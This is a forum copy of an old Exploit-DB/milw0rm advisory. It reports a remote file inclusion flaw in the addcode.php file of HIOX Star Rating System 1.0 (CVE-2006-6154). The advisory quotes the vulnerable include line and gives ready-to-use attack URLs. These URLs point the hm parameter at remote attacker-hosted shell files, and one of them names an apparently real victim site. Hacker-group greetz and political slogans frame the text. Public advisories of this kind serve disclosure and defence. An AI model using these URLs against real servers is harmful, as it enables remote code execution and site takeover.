- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2838
- Проверка EDB
-
- Пройдено
- Автор
- COLD ZERO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6154
- Дата публикации
- 2006-11-23
Код:
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
HSRS <= 1.0 (HIOX Star Rating System Script) (addcode.php) Remote File
Include Vulnerability
Found By : CoLd Zero [ Wasem898 ]
Source : include_once ($4AZHAR_TeAM."Securty.");
require ($SpECiALPowEr.oRg_TeAm."Securty");
A_mal Hackeing Team _ Hacking
PalesTine Arab Muslim Hacker
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
######################################################
#
# HSRS 1.0 (HIOX Star Rating System Script)
#
# Class: Remote File Include Vulnerability
# Published 2006-11-23
# Remote: Yes
# Type: High
# Site: http://www.hscripts.com/scripts/php/downloads/HSRS.zip
#
# Author: Cold Zero
# Contact: [email protected]
#
######################################################
About :
FREE Five Star Rating System Script that can be added in any web page with
php support.
A database based script developed using php and javascript.
This give your users a chance to rate on your articles, tutorials, photos,
images or whatever you want on a scale of 1-5 stars.
==========================
file ;
addcode.php
==========================
include "$hm/auth/config.php";
======================================================
Example:
http://www.jusmail.com/5000/HSRS/addcode.php?hm=http://www.violatorthrash.com/flyers/cold.txt?cmd
======================================================
Exploit :
Http://www.Victem.0/[PaTH]/addcode.php?hm=http://coldzero.shell?cmd
======================================================
---- GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
[Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[
****************************************************************
# *www.4azhar.com Securty Team >> www.4azhar.com *
# *SpeciaL PoweR SecuritY Team >> www.specialpower.org *
# *A_mal Hacking Team >> -vv -l -p The-Pradise *
*****************************************************************
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
# milw0rm.com [2006-11-23]- Источник
- www.exploit-db.com
